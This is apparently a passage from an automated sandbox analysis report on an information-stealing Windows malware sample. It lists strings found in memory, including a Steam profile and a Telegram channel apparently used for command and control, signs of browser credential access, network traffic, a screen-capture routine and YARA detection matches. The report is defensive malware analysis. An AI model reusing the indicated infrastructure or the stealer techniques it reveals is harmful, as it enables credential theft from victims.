                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: AFBFHD.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: AFBFHD.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: AFBFHD.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: ECGIII.1.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001062000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899%
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899u
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: CBGCAF.1.drString found in binary or memory: https://support.mozilla.org
                    Source: CBGCAF.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: CBGCAF.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp, FIIDBK.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: FIIDBK.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp, FIIDBK.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: FIIDBK.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: AFBFHD.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: AFBFHD.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIDGDHJDBK
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: CBGCAF.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownHTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_004112FD

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D02B6B00_2_6D02B6B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D022D700_2_6D022D70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D07AC290_2_6D07AC29
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D054EE00_2_6D054EE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0449700_2_6D044970
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D008B300_2_6D008B30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D070B890_2_6D070B89
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D044AC00_2_6D044AC0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D07A54D0_2_6D07A54D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0445500_2_6D044550
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D00C7B00_2_6D00C7B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D00A7E00_2_6D00A7E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0066500_2_6D006650
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D01A0C00_2_6D01A0C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0623100_2_6D062310
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0563B00_2_6D0563B0
